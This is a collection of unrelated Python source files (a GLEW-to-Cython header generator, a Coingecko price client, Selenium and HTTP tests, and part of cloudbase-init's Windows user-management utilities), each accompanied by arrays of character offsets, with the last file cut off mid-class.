10683
],
[
10712,
10723
],
[
10749,
10760
],
[
11634,
11645
],
[
12076,
12087
],
[
12257,
12268
],
[
12620,
12631
],
[
12780,
12791
],
[
13285,
13296
],
[
13329,
13340
],
[
13369,
13380
],
[
13446,
13457
]
],
[
[
16737,
16747
],
[
8716,
8726
],
[
16653,
16663
]
],
[
[
17136,
17157
],
[
10989,
11010
],
[
13676,
13697
]
]
] |
"""
Script taken from: https://github.com/orlp/pygrafix
Appropriate Licence applies!
"""
import argparse
import os
import pathlib
import re
def generate_pxd(glew_header_loc, dest="."):
with open(glew_header_loc) as fin:
data = fin.read()
# cython doesn't support const
data = re.sub(r"\bconst\b", "", data)
lines = data.split("\n")
handled_lines = set()
function_types = {}
export_functions = {}
function_defs = []
enums = []
# read in function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"typedef\s+([^(]+)\([^*]+\*\s*([a-zA-Z_][a-zA-Z0-9_]+)\)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_types[result[1]] = (result[0].strip(), result[2])
handled_lines.add(linenr)
# read in exported functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLEW_FUN_EXPORT\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+([a-zA-Z_][a-zA-Z0-9_]+)",
line,
)[0]
except IndexError:
continue
export_functions[result[1]] = result[0]
handled_lines.add(linenr)
# match exported functions with function types
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_FUN\s*\(\s*([a-zA-Z_][a-zA-Z0-9_]+)\s*\)",
line,
)[0]
except IndexError:
continue
export_func = export_functions[result[1]]
function_defs.append(
function_types[export_func][0]
+ " "
+ result[0]
+ function_types[export_func][1]
)
handled_lines.add(linenr)
# add GLAPIENTRY functions
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"GLAPI\s+([a-zA-Z_][a-zA-Z0-9_]+)[^a-zA-Z_]+GLAPIENTRY[^a-zA-Z_]+([a-zA-Z_][a-zA-Z0-9_]+)\s*(\(.+\))\s*;",
line,
)[0]
except IndexError:
continue
function_defs.append(" ".join(result))
handled_lines.add(linenr)
# read in numeric defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+(?:(?:0x[0-9a-fA-F]+)|[0-9]+)",
line,
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# read in GLEW vars as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+([a-zA-Z_][a-zA-Z0-9_]+)\s+GLEW_GET_VAR\(.+\)", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
# also accept GL to GL defines as enums
for linenr, line in enumerate(lines):
try:
result = re.findall(
r"#define\s+(GL_[a-zA-Z0-9_]+)\s+GL_[a-zA-Z0-9_]+", line
)[0]
except IndexError:
continue
enums.append(result)
handled_lines.add(linenr)
pxdheader = """# cython: language_level=3
from libc.stdint cimport int64_t, uint64_t
cdef extern from "include_glew.h":
ctypedef struct _cl_context:
pass
ctypedef struct _cl_event:
pass
ctypedef struct __GLsync:
pass
ctypedef unsigned short wchar_t
ctypedef int ptrdiff_t
ctypedef unsigned int GLenum
ctypedef unsigned int GLbitfield
ctypedef unsigned int GLuint
ctypedef int GLint
ctypedef int GLsizei
ctypedef char GLchar
ctypedef unsigned char GLboolean
ctypedef signed char GLbyte
ctypedef short GLshort
ctypedef unsigned char GLubyte
ctypedef unsigned short GLushort
ctypedef unsigned long GLulong
ctypedef float GLfloat
ctypedef float GLclampf
ctypedef double GLdouble
ctypedef double GLclampd
ctypedef int GLfixed
ctypedef int GLclampx
ctypedef void GLvoid
ctypedef int64_t GLint64EXT
ctypedef uint64_t GLuint64EXT
ctypedef GLint64EXT GLint64
ctypedef GLuint64EXT GLuint64
ctypedef __GLsync *GLsync
ctypedef char GLcharARB
ctypedef ptrdiff_t GLintptr
ctypedef ptrdiff_t GLsizeiptr
ctypedef _cl_context *cl_context
ctypedef _cl_event *cl_event
ctypedef unsigned int GLhandleARB
ctypedef ptrdiff_t GLintptrARB
ctypedef ptrdiff_t GLsizeiptrARB
ctypedef void* GLeglClientBufferEXT
ctypedef unsigned short GLhalf
ctypedef GLintptr GLvdpauSurfaceNV
ctypedef long GLVULKANPROCNV
ctypedef void *GLeglImageOES # GL_EXT_EGL_image_storage
ctypedef void (__stdcall *GLDEBUGPROCAMD)(GLuint id, GLenum category, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROCARB)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, GLchar *message, GLvoid *userParam)
ctypedef void (__stdcall *GLDEBUGPROC)(GLenum source, GLenum type, GLuint id, GLenum severity, GLsizei length, const GLchar* message, GLvoid* userParam)
ctypedef void (__stdcall *GLLOGPROCREGAL)(GLenum stream, GLsizei length, const GLchar *message, GLvoid *context)
GLenum glewInit()
GLboolean glewIsSupported(char *name)
GLboolean glewIsExtensionSupported(char *name)
GLboolean glewGetExtension(char* name)
GLubyte *glewGetErrorString(GLenum error)
GLubyte *glewGetString(GLenum name)
"""
dest = pathlib.Path(dest)
dest.mkdir(exist_ok=True, parents=True)
with (dest / "glew.pxd").open("w") as fout:
data = pxdheader
data += " enum:\n"
data += "\n".join(" " + enum for enum in set(enums))
data += "\n\n"
def mod_func(func):
keywords = [
"and",
"del",
"for",
"is",
"raise",
"assert",
"elif",
"from",
"lambda",
"return",
"break",
"else",
"global",
"not",
"try",
"class",
"except",
"if",
"or",
"while",
"continue",
"exec",
"import",
"pass",
"yield",
"def",
"finally",
"in",
"print",
]
# beautify functions
func = re.sub(r"\s+", " ", func) # collapse whitespace
func = re.sub(r"\s*([()])\s*", r"\1", func) # no whitespace near brackets
func = re.sub(r"\s*,\s*", r", ", func) # only whitespace __after__ comma
func = re.sub(
r"\s*(\*+)\s*", r" \1", func
) # beautify pointers in functions
# cython doesn't support (void), need to do () for no arguments instead
func = re.sub(r"\(void\)", "()", func)
# keywords...
for keyword in keywords:
func = re.sub(r"\b%s\b" % keyword, keyword + "_", func)
return func
data += "\n".join(" " + mod_func(func) for func in function_defs)
fout.write(data)
with (dest / "unhandled_glew.h").open("w") as fout:
data = "\n".join(
lines[linenr] for linenr in range(len(lines)) if linenr not in handled_lines
)
data = re.sub("\n\n+", "\n", data)
fout.write(data)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("glew_header_loc")
parser.add_argument("destination")
args = parser.parse_args()
generate_pxd(args.glew_header_loc, dest=args.destination)
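# Example invocation (illustrative script name and paths, adjust to the local GLEW install):
#   python generate_pxd.py /usr/include/GL/glew.h pygrafix/gl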
| [
[
[
97,
105
],
[
7787,
7795
]
],
[
[
113,
115
]
],
[
[
123,
130
],
[
5666,
5673
]
],
[
[
138,
140
],
[
300,
302
],
[
582,
584
],
[
984,
986
],
[
1384,
1386
],
[
1953,
1955
],
[
2374,
2376
],
[
2734,
2736
],
[
3077,
3079
],
[
7692,
7694
],
[
6752,
6754
],
[
6820,
6822
],
[
6907,
6909
],
[
6993,
6995
],
[
7198,
7200
],
[
7317,
7319
]
],
[
[
147,
159
],
[
7930,
7942
]
],
[
[
7778,
7784
],
[
7817,
7823
],
[
7860,
7866
],
[
7906,
7912
]
],
[
[
7899,
7903
],
[
7943,
7947
],
[
7970,
7974
]
]
] |
import logging
from urllib.parse import urljoin
import requests
from eth_typing import ChecksumAddress
from safe_transaction_service.tokens.clients.exceptions import CannotGetPrice
logger = logging.getLogger(__name__)
class CoingeckoClient:
base_url = 'https://api.coingecko.com/'
def __init__(self):
self.http_session = requests.Session()
def _get_price(self, url: str, name: str):
try:
response = self.http_session.get(url, timeout=10)
if not response.ok:
raise CannotGetPrice
# Result is returned with lowercased `token_address`
price = response.json().get(name)
if price and price.get('usd'):
return price['usd']
else:
raise CannotGetPrice(f'Price from url={url} is {price}')
except (ValueError, IOError) as e:
logger.warning('Problem getting usd value on coingecko for token-name=%s', name)
raise CannotGetPrice from e
def get_price(self, name: str) -> float:
"""
:param name: coin name
        :return: usd price for the coin name (raises CannotGetPrice if it cannot be retrieved)
"""
name = name.lower()
url = urljoin(self.base_url,
f'/api/v3/simple/price?ids={name}&vs_currencies=usd')
return self._get_price(url, name)
def get_token_price(self, token_address: ChecksumAddress) -> float:
"""
:param token_address:
        :return: usd price for the token address (raises CannotGetPrice if it cannot be retrieved)
"""
token_address = token_address.lower()
url = urljoin(self.base_url,
f'api/v3/simple/token_price/ethereum?contract_addresses={token_address}&vs_currencies=usd')
return self._get_price(url, token_address)
def get_ewt_usd_price(self) -> float:
return self.get_price('energy-web-token')
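# A minimal usage sketch (illustrative; performs live HTTP requests against the
# public Coingecko API and raises CannotGetPrice when a price is unavailable):
#
#     client = CoingeckoClient()
#     eth_usd = client.get_price('ethereum')
#     ewt_usd = client.get_ewt_usd_price()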
| [
[
[
7,
14
],
[
193,
200
]
],
[
[
40,
47
],
[
1213,
1220
],
[
1603,
1610
]
],
[
[
56,
64
],
[
343,
351
]
],
[
[
88,
103
],
[
1400,
1415
]
],
[
[
168,
182
],
[
539,
553
],
[
784,
798
],
[
989,
1003
]
],
[
[
184,
190
],
[
890,
896
]
],
[
[
229,
244
]
]
] |
# -*- coding: utf-8 -*-
from selenium_tests.UserDriverTest import UserDriverTest
from selenium.webdriver.common.by import By
class TestHideApplication(UserDriverTest):
def test_hide_application(self):
self.wait_until_application_list_loaded()
self.type_text_in_element_located(By.ID, "search-input", "foobarheho")
self.wait_until_text_inside_element_located(By.ID, "applistentries", "")
| [
[
[
66,
80
],
[
153,
167
]
],
[
[
122,
124
],
[
300,
302
],
[
390,
392
]
],
[
[
133,
152
]
]
] |
import anachronos
from e2e_test.runner import http
class ExceptionResourceTest(anachronos.TestCase):
def setUp(self):
self.http = http.with_path("/api/error")
def test_got500OnInternalServerError(self):
response = self.http.get("")
self.assertEqual(500, response.status_code)
def test_got404OnResourceNotFound(self):
response = self.http.get("/inexistent-path")
self.assertEqual(404, response.status_code)
def test_got405MethodNotAllowed(self):
response = self.http.post("")
self.assertEqual(405, response.status_code)
def test_givenNullPointerException_thenReturn500InternalServerError(self):
response = self.http.get("/none")
self.assertEqual(500, response.status_code)
if __name__ == '__main__':
anachronos.run_tests()
| [
[
[
7,
17
],
[
82,
92
],
[
809,
819
]
],
[
[
47,
51
],
[
146,
150
]
],
[
[
60,
81
]
]
] |
from st_library import Library
st_lib = Library()
st_lib.set_token('token')
st_lib.set_config_id('52db99d3-edfb-44c5-b97a-f09df4402081')
print(st_lib.unstruct_data.download_file("19a29b9b-bea2-40fb-89c4-555bba829539","image.jpg"))
| [
[
[
23,
30
],
[
41,
48
]
],
[
[
32,
38
],
[
51,
57
],
[
77,
83
],
[
144,
150
]
]
] |
# Copyright 2012 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import contextlib
import ctypes
from ctypes import wintypes
import os
import re
import struct
import subprocess
import time
import netaddr
from oslo_log import log as oslo_logging
import pywintypes
import six
from six.moves import winreg
from tzlocal import windows_tz
import win32api
from win32com import client
import win32net
import win32netcon
import win32process
import win32security
import win32service
import winerror
from cloudbaseinit import constant
from cloudbaseinit import exception
from cloudbaseinit.osutils import base
from cloudbaseinit.utils import classloader
from cloudbaseinit.utils import retry_decorator
from cloudbaseinit.utils.windows import disk
from cloudbaseinit.utils.windows import network
from cloudbaseinit.utils.windows import privilege
from cloudbaseinit.utils.windows import timezone
from cloudbaseinit.utils.windows import wmi_loader
wmi = wmi_loader.wmi()
LOG = oslo_logging.getLogger(__name__)
AF_INET = 2
AF_INET6 = 23
UNICAST = 1
MANUAL = 1
PREFERRED_ADDR = 4
advapi32 = ctypes.windll.advapi32
kernel32 = ctypes.windll.kernel32
netapi32 = ctypes.windll.netapi32
userenv = ctypes.windll.userenv
iphlpapi = ctypes.windll.iphlpapi
Ws2_32 = ctypes.windll.Ws2_32
setupapi = ctypes.windll.setupapi
msvcrt = ctypes.cdll.msvcrt
ntdll = ctypes.windll.ntdll
secur32 = ctypes.windll.secur32
class Win32_PROFILEINFO(ctypes.Structure):
_fields_ = [
('dwSize', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('lpUserName', wintypes.LPWSTR),
('lpProfilePath', wintypes.LPWSTR),
('lpDefaultPath', wintypes.LPWSTR),
('lpServerName', wintypes.LPWSTR),
('lpPolicyPath', wintypes.LPWSTR),
('hprofile', wintypes.HANDLE)
]
class Win32_LOCALGROUP_MEMBERS_INFO_3(ctypes.Structure):
_fields_ = [
('lgrmi3_domainandname', wintypes.LPWSTR)
]
class Win32_MIB_IPFORWARDROW(ctypes.Structure):
_fields_ = [
('dwForwardDest', wintypes.DWORD),
('dwForwardMask', wintypes.DWORD),
('dwForwardPolicy', wintypes.DWORD),
('dwForwardNextHop', wintypes.DWORD),
('dwForwardIfIndex', wintypes.DWORD),
('dwForwardType', wintypes.DWORD),
('dwForwardProto', wintypes.DWORD),
('dwForwardAge', wintypes.DWORD),
('dwForwardNextHopAS', wintypes.DWORD),
('dwForwardMetric1', wintypes.DWORD),
('dwForwardMetric2', wintypes.DWORD),
('dwForwardMetric3', wintypes.DWORD),
('dwForwardMetric4', wintypes.DWORD),
('dwForwardMetric5', wintypes.DWORD)
]
class Win32_MIB_IPFORWARDTABLE(ctypes.Structure):
_fields_ = [
('dwNumEntries', wintypes.DWORD),
('table', Win32_MIB_IPFORWARDROW * 1)
]
class Win32_OSVERSIONINFOEX_W(ctypes.Structure):
_fields_ = [
('dwOSVersionInfoSize', wintypes.DWORD),
('dwMajorVersion', wintypes.DWORD),
('dwMinorVersion', wintypes.DWORD),
('dwBuildNumber', wintypes.DWORD),
('dwPlatformId', wintypes.DWORD),
('szCSDVersion', wintypes.WCHAR * 128),
('wServicePackMajor', wintypes.WORD),
('wServicePackMinor', wintypes.WORD),
('wSuiteMask', wintypes.WORD),
('wProductType', wintypes.BYTE),
('wReserved', wintypes.BYTE)
]
class Win32_SP_DEVICE_INTERFACE_DATA(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('InterfaceClassGuid', disk.GUID),
('Flags', wintypes.DWORD),
('Reserved', ctypes.POINTER(wintypes.ULONG))
]
class Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W(ctypes.Structure):
_fields_ = [
('cbSize', wintypes.DWORD),
('DevicePath', ctypes.c_byte * 2)
]
class Win32_STORAGE_DEVICE_NUMBER(ctypes.Structure):
_fields_ = [
('DeviceType', wintypes.DWORD),
('DeviceNumber', wintypes.DWORD),
('PartitionNumber', wintypes.DWORD)
]
class Win32_STARTUPINFO_W(ctypes.Structure):
_fields_ = [
('cb', wintypes.DWORD),
('lpReserved', wintypes.LPWSTR),
('lpDesktop', wintypes.LPWSTR),
('lpTitle', wintypes.LPWSTR),
('dwX', wintypes.DWORD),
('dwY', wintypes.DWORD),
('dwXSize', wintypes.DWORD),
('dwYSize', wintypes.DWORD),
('dwXCountChars', wintypes.DWORD),
('dwYCountChars', wintypes.DWORD),
('dwFillAttribute', wintypes.DWORD),
('dwFlags', wintypes.DWORD),
('wShowWindow', wintypes.WORD),
('cbReserved2', wintypes.WORD),
('lpReserved2', ctypes.POINTER(wintypes.BYTE)),
('hStdInput', wintypes.HANDLE),
('hStdOutput', wintypes.HANDLE),
('hStdError', wintypes.HANDLE),
]
class Win32_PROCESS_INFORMATION(ctypes.Structure):
_fields_ = [
('hProcess', wintypes.HANDLE),
('hThread', wintypes.HANDLE),
('dwProcessId', wintypes.DWORD),
('dwThreadId', wintypes.DWORD),
]
advapi32.CreateProcessAsUserW.argtypes = [wintypes.HANDLE,
wintypes.LPCWSTR,
wintypes.LPWSTR,
ctypes.c_void_p,
ctypes.c_void_p,
wintypes.BOOL,
wintypes.DWORD,
ctypes.c_void_p,
wintypes.LPCWSTR,
ctypes.POINTER(
Win32_STARTUPINFO_W),
ctypes.POINTER(
Win32_PROCESS_INFORMATION)]
advapi32.CreateProcessAsUserW.restype = wintypes.BOOL
msvcrt.malloc.argtypes = [ctypes.c_size_t]
msvcrt.malloc.restype = ctypes.c_void_p
msvcrt.free.argtypes = [ctypes.c_void_p]
msvcrt.free.restype = None
ntdll.RtlGetVersion.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W)]
ntdll.RtlGetVersion.restype = wintypes.DWORD
ntdll.RtlVerifyVersionInfo.argtypes = [
ctypes.POINTER(Win32_OSVERSIONINFOEX_W),
wintypes.DWORD, wintypes.ULARGE_INTEGER]
ntdll.RtlVerifyVersionInfo.restype = wintypes.DWORD
kernel32.VerSetConditionMask.argtypes = [wintypes.ULARGE_INTEGER,
wintypes.DWORD,
wintypes.BYTE]
kernel32.VerSetConditionMask.restype = wintypes.ULARGE_INTEGER
kernel32.SetComputerNameExW.argtypes = [ctypes.c_int, wintypes.LPCWSTR]
kernel32.SetComputerNameExW.restype = wintypes.BOOL
kernel32.GetLogicalDriveStringsW.argtypes = [wintypes.DWORD, wintypes.LPWSTR]
kernel32.GetLogicalDriveStringsW.restype = wintypes.DWORD
kernel32.GetDriveTypeW.argtypes = [wintypes.LPCWSTR]
kernel32.GetDriveTypeW.restype = wintypes.UINT
kernel32.CreateFileW.argtypes = [wintypes.LPCWSTR, wintypes.DWORD,
wintypes.DWORD, wintypes.LPVOID,
wintypes.DWORD, wintypes.DWORD,
wintypes.HANDLE]
kernel32.CreateFileW.restype = wintypes.HANDLE
kernel32.DeviceIoControl.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
wintypes.LPVOID, wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
kernel32.DeviceIoControl.restype = wintypes.BOOL
kernel32.GetProcessHeap.argtypes = []
kernel32.GetProcessHeap.restype = wintypes.HANDLE
kernel32.HeapAlloc.argtypes = [wintypes.HANDLE, wintypes.DWORD,
ctypes.c_size_t]
kernel32.HeapAlloc.restype = wintypes.LPVOID
kernel32.HeapFree.argtypes = [wintypes.HANDLE, wintypes.DWORD,
wintypes.LPVOID]
kernel32.HeapFree.restype = wintypes.BOOL
kernel32.GetVolumeNameForVolumeMountPointW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.GetVolumeNameForVolumeMountPointW.restype = wintypes.BOOL
kernel32.GetVolumePathNamesForVolumeNameW.argtypes = [wintypes.LPCWSTR,
wintypes.LPWSTR,
wintypes.DWORD,
ctypes.POINTER(
wintypes.DWORD)]
kernel32.GetVolumePathNamesForVolumeNameW.restype = wintypes.BOOL
kernel32.FindFirstVolumeW.argtypes = [wintypes.LPWSTR, wintypes.DWORD]
kernel32.FindFirstVolumeW.restype = wintypes.HANDLE
kernel32.FindNextVolumeW.argtypes = [wintypes.HANDLE,
wintypes.LPWSTR,
wintypes.DWORD]
kernel32.FindNextVolumeW.restype = wintypes.BOOL
kernel32.FindVolumeClose.argtypes = [wintypes.HANDLE]
kernel32.FindVolumeClose.restype = wintypes.BOOL
iphlpapi.GetIpForwardTable.argtypes = [
ctypes.POINTER(Win32_MIB_IPFORWARDTABLE),
ctypes.POINTER(wintypes.ULONG),
wintypes.BOOL]
iphlpapi.GetIpForwardTable.restype = wintypes.DWORD
Ws2_32.inet_ntoa.restype = ctypes.c_char_p
secur32.GetUserNameExW.argtypes = [wintypes.DWORD,
wintypes.LPWSTR,
ctypes.POINTER(wintypes.ULONG)]
secur32.GetUserNameExW.restype = wintypes.BOOL
setupapi.SetupDiGetClassDevsW.argtypes = [ctypes.POINTER(disk.GUID),
wintypes.LPCWSTR,
wintypes.HANDLE,
wintypes.DWORD]
setupapi.SetupDiGetClassDevsW.restype = wintypes.HANDLE
setupapi.SetupDiEnumDeviceInterfaces.argtypes = [
wintypes.HANDLE,
wintypes.LPVOID,
ctypes.POINTER(disk.GUID),
wintypes.DWORD,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA)]
setupapi.SetupDiEnumDeviceInterfaces.restype = wintypes.BOOL
setupapi.SetupDiGetDeviceInterfaceDetailW.argtypes = [
wintypes.HANDLE,
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DATA),
ctypes.POINTER(Win32_SP_DEVICE_INTERFACE_DETAIL_DATA_W),
wintypes.DWORD,
ctypes.POINTER(wintypes.DWORD),
wintypes.LPVOID]
setupapi.SetupDiGetDeviceInterfaceDetailW.restype = wintypes.BOOL
setupapi.SetupDiDestroyDeviceInfoList.argtypes = [wintypes.HANDLE]
setupapi.SetupDiDestroyDeviceInfoList.restype = wintypes.BOOL
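# Note: the argtypes/restype declarations above tell ctypes how to marshal each
# Win32 call, so mismatched arguments raise an error at call time instead of
# silently passing wrong-sized values.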
VER_MAJORVERSION = 1
VER_MINORVERSION = 2
VER_BUILDNUMBER = 4
VER_GREATER_EQUAL = 3
GUID_DEVINTERFACE_DISK = disk.GUID(0x53f56307, 0xb6bf, 0x11d0, 0x94, 0xf2,
0x00, 0xa0, 0xc9, 0x1e, 0xfb, 0x8b)
class WindowsUtils(base.BaseOSUtils):
NERR_GroupNotFound = 2220
NERR_UserNotFound = 2221
ERROR_PATH_NOT_FOUND = 3
ERROR_ACCESS_DENIED = 5
ERROR_INSUFFICIENT_BUFFER = 122
ERROR_INVALID_NAME = 123
ERROR_NO_DATA = 232
ERROR_MORE_DATA = 234
ERROR_NO_SUCH_MEMBER = 1387
ERROR_MEMBER_IN_ALIAS = 1378
ERROR_INVALID_MEMBER = 1388
ERROR_NO_MORE_FILES = 18
STATUS_REVISION_MISMATCH = 0xC0000059
ADS_UF_PASSWORD_EXPIRED = 0x800000
PASSWORD_CHANGED_FLAG = 1
INVALID_HANDLE_VALUE = 0xFFFFFFFF
FILE_SHARE_READ = 1
FILE_SHARE_WRITE = 2
OPEN_EXISTING = 3
IOCTL_STORAGE_GET_DEVICE_NUMBER = 0x002D1080
MAX_PATH = 260
DIGCF_PRESENT = 2
DIGCF_DEVICEINTERFACE = 0x10
DRIVE_CDROM = 5
INFINITE = 0xFFFFFFFF
CREATE_NEW_CONSOLE = 0x10
LOGON32_LOGON_BATCH = 4
LOGON32_LOGON_INTERACTIVE = 2
LOGON32_LOGON_SERVICE = 5
LOGON32_PROVIDER_DEFAULT = 0
EXTENDED_NAME_FORMAT_SAM_COMPATIBLE = 2
SERVICE_STATUS_STOPPED = "Stopped"
SERVICE_STATUS_START_PENDING = "Start Pending"
SERVICE_STATUS_STOP_PENDING = "Stop Pending"
SERVICE_STATUS_RUNNING = "Running"
SERVICE_STATUS_CONTINUE_PENDING = "Continue Pending"
SERVICE_STATUS_PAUSE_PENDING = "Pause Pending"
SERVICE_STATUS_PAUSED = "Paused"
SERVICE_STATUS_UNKNOWN = "Unknown"
SERVICE_START_MODE_AUTOMATIC = "Automatic"
SERVICE_START_MODE_MANUAL = "Manual"
SERVICE_START_MODE_DISABLED = "Disabled"
_SERVICE_START_TYPE_MAP = {
SERVICE_START_MODE_AUTOMATIC:
win32service.SERVICE_AUTO_START,
SERVICE_START_MODE_MANUAL:
win32service.SERVICE_DEMAND_START,
SERVICE_START_MODE_DISABLED:
win32service.SERVICE_DISABLED}
_SERVICE_STATUS_MAP = {
win32service.SERVICE_CONTINUE_PENDING:
SERVICE_STATUS_CONTINUE_PENDING,
win32service.SERVICE_PAUSE_PENDING:
SERVICE_STATUS_PAUSE_PENDING,
win32service.SERVICE_PAUSED:
SERVICE_STATUS_PAUSED,
win32service.SERVICE_RUNNING:
SERVICE_STATUS_RUNNING,
win32service.SERVICE_START_PENDING:
SERVICE_STATUS_START_PENDING,
win32service.SERVICE_STOP_PENDING:
SERVICE_STATUS_STOP_PENDING,
win32service.SERVICE_STOPPED:
SERVICE_STATUS_STOPPED,
}
ComputerNamePhysicalDnsHostname = 5
_config_key = 'SOFTWARE\\Cloudbase Solutions\\Cloudbase-Init\\'
_service_name = 'cloudbase-init'
_FW_IP_PROTOCOL_TCP = 6
_FW_IP_PROTOCOL_UDP = 17
_FW_SCOPE_ALL = 0
_FW_SCOPE_LOCAL_SUBNET = 1
VER_NT_WORKSTATION = 1
def __init__(self):
self._network_team_manager = None
def reboot(self):
with privilege.acquire_privilege(win32security.SE_SHUTDOWN_NAME):
ret_val = advapi32.InitiateSystemShutdownExW(
0, "Cloudbase-Init reboot",
0, True, True, 0)
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Reboot failed: %r")
def user_exists(self, username):
try:
self._get_user_info(username, 1)
return True
except exception.ItemNotFoundException:
# User not found
return False
def create_user(self, username, password, password_expires=False):
user_info = {
"name": username,
"password": password,
"priv": win32netcon.USER_PRIV_USER,
"flags": win32netcon.UF_NORMAL_ACCOUNT | win32netcon.UF_SCRIPT,
}
if not password_expires:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserAdd(None, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create user failed: %s" % ex.args[2])
def rename_user(self, username, new_username):
user_info = {
"name": new_username,
}
try:
win32net.NetUserSetInfo(None, username, 0, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Renaming user failed: %s" % ex.args[2])
def set_user_info(self, username, full_name=None,
disabled=False, expire_interval=None):
user_info = self._get_user_info(username, 2)
if full_name:
user_info["full_name"] = full_name
if disabled:
user_info["flags"] |= win32netcon.UF_ACCOUNTDISABLE
else:
user_info["flags"] &= ~win32netcon.UF_ACCOUNTDISABLE
if expire_interval is not None:
user_info["acct_expires"] = int(expire_interval)
else:
user_info["acct_expires"] = win32netcon.TIMEQ_FOREVER
try:
win32net.NetUserSetInfo(None, username, 2, user_info)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
LOG.debug(ex)
raise exception.CloudbaseInitException(
"Setting user info failed: %s" % ex.args[2])
def enum_users(self):
usernames = []
resume_handle = 0
while True:
try:
users_info, total, resume_handle = win32net.NetUserEnum(
None, 0, win32netcon.FILTER_NORMAL_ACCOUNT, resume_handle)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Enumerating users failed: %s" % ex.args[2])
usernames += [u["name"] for u in users_info]
if not resume_handle:
return usernames
def is_builtin_admin(self, username):
sid = self.get_user_sid(username)
return sid and sid.startswith(u"S-1-5-") and sid.endswith(u"-500")
def _get_user_info(self, username, level):
try:
return win32net.NetUserGetInfo(None, username, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_UserNotFound:
raise exception.ItemNotFoundException(
"User not found: %s" % username)
else:
raise exception.CloudbaseInitException(
"Failed to get user info: %s" % ex.args[2])
def set_user_password(self, username, password, password_expires=False):
user_info = self._get_user_info(username, 1)
user_info["password"] = password
if password_expires:
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
else:
user_info["flags"] |= win32netcon.UF_DONT_EXPIRE_PASSWD
try:
win32net.NetUserSetInfo(None, username, 1, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Set user password failed: %s" % ex.args[2])
def change_password_next_logon(self, username):
"""Force the given user to change the password at next logon."""
user_info = self._get_user_info(username, 4)
user_info["flags"] &= ~win32netcon.UF_DONT_EXPIRE_PASSWD
user_info["password_expired"] = 1
try:
win32net.NetUserSetInfo(None, username, 4, user_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Setting password expiration failed: %s" % ex.args[2])
def group_exists(self, group):
try:
self._get_group_info(group, 1)
return True
except exception.ItemNotFoundException:
# Group not found
return False
def _get_group_info(self, group, level):
try:
return win32net.NetLocalGroupGetInfo(None, group, level)
except win32net.error as ex:
if ex.args[0] == self.NERR_GroupNotFound:
raise exception.ItemNotFoundException(
"Group not found: %s" % group)
else:
raise exception.CloudbaseInitException(
"Failed to get group info: %s" % ex.args[2])
def create_group(self, group, description=None):
group_info = {"name": group}
try:
win32net.NetLocalGroupAdd(None, 0, group_info)
except win32net.error as ex:
raise exception.CloudbaseInitException(
"Create group failed: %s" % ex.args[2])
@staticmethod
def _get_cch_referenced_domain_name(domain_name):
return wintypes.DWORD(
ctypes.sizeof(domain_name) // ctypes.sizeof(wintypes.WCHAR))
def _get_user_sid_and_domain(self, username):
sid = ctypes.create_string_buffer(1024)
cbSid = wintypes.DWORD(ctypes.sizeof(sid))
domainName = ctypes.create_unicode_buffer(1024)
cchReferencedDomainName = self._get_cch_referenced_domain_name(
domainName)
sidNameUse = wintypes.DWORD()
ret_val = advapi32.LookupAccountNameW(
0, six.text_type(username), sid, ctypes.byref(cbSid), domainName,
ctypes.byref(cchReferencedDomainName), ctypes.byref(sidNameUse))
if not ret_val:
raise exception.WindowsCloudbaseInitException(
"Cannot get user SID: %r")
return sid, domainName.value
def add_user_to_local_group(self, username, groupname):
lmi = Win32_LOCALGROUP_MEMBERS_INFO_3()
lmi.lgrmi3_domainandname = six.text_type(username)
ret_val = netapi32.NetLocalGroupAddMembers(0, six.text_type(groupname),
3, ctypes.pointer(lmi), 1)
if ret_val == self.NERR_GroupNotFound:
raise exception.CloudbaseInitException("Group '%s' not found"
% groupname)
elif ret_val == self.ERROR_ACCESS_DENIED:
raise exception.CloudbaseInitException('Access denied')
